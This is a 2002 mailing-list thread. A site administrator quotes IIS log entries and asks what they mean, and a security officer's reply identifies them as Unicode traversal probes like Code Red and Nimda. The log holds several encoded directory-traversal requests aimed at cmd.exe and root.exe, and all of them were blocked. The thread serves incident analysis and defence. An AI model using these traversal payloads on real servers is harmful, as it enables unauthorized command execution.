They look like unicode + codered and nimda attacks. Regards, --------- Muhammad Faisal Rauf Danka
Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk voice: 92-021-111-GEMNET Vice President Pakistan Computer Emergency Responce Team (PakCERT) web: www.pakcert.org Chief Security Analyst Applied Technology Research Center (ATRC) web: www.atrc.net.pk voice: 92-21-4980523 92-21-4974781 "Great is the Art of beginning, but Greater is the Art of ending. " ------BEGIN GEEK CODE BLOCK---- Version: 3.1 GCS/CM/P/TW d- s: !a C++ B@ L$ S$ U+++ P+ L+++ E--- W+ N+ o+ K- w-- O- PS PE- Y- PGP+ t+ X R tv+ b++ DI+ D G e++ h! r+ y+ ------END GEEK CODE BLOCK------ --- Craig Brauckmiller <[EMAIL PROTECTED]> wrote: > > >Hello all and forgive my ignorance in this area. > >We are in the process of bringing our website in house. It >was being hosted >externally >The site is almost up and I was just poking at the logs and >was intrigued by >what I saw. > >Below is a snippet from the logs. Can anyone tell by >looking at it: > >1. What type of vulnerabilities were they looking for? >2. Does the fact the it says <Rejected by urlscan> imply >that URLScan from M$ >is loaded. I didn't do this myself...thats why I'm curious. >3. What is the best course of action in regards to the >individual attempting >these activities? I traced the IP back to RoadRunner. >Should I call their >customer service and complain or am I just pissing in the >wind? >4. I did run the IIS Lockdown wizard. Is that sufficient >for most types of >attacks? What other tools should I consider running? > >#Fields: date time c-ip cs-username s-ip s-port cs-method >cs-uri-stem >cs-uri-query sc-status sc-win32-status cs(User-Agent) >2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/root.exe 404 123 - >2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/MSADC/root.exe 404 123 - >2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/c/winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/d/winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%255c../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/_vti_bin/..%255c../..%255c../..% >255c../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/_mem_bin/..%255c../..%255c../..% >255c../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1% >1c../..%c1%1c../winnt/system32/cmd.exe > >404 123 - >2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 - >2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 >GET /<Rejected-By-UrlScan> >~/scripts/..%252f../winnt/system32/cmd.exe 404 123 - > >Thanks so much for this great list. > >Craig Brauckmiller _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by Everyone.net http://www.everyone.net/?btn=tag
